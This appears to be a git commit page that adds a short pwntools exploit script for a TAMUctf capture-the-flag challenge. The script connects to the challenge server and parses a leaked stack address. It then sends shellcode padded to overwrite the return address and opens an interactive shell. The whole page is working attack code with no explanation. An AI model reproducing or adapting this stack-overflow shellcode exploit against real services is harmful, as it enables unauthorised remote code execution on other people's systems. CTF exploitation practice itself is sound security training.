Mon, 25 Feb 2019 08:53:54 +0800

master
大蒟蒻 7 years ago
parent 7728c15b1a
commit 717b17fc78

Binary file not shown.

@ -0,0 +1,6 @@
from pwn import *
sh = remote("pwn.tamuctf.com", 4323)
p = p32(int(sh.recvline()[-12:-2], 16))
pld = asm(shellcraft.sh()).ljust(0x12a + 4, 'a') + p
sh.sendline(pld)
sh.interactive()
Loading…
Cancel
Save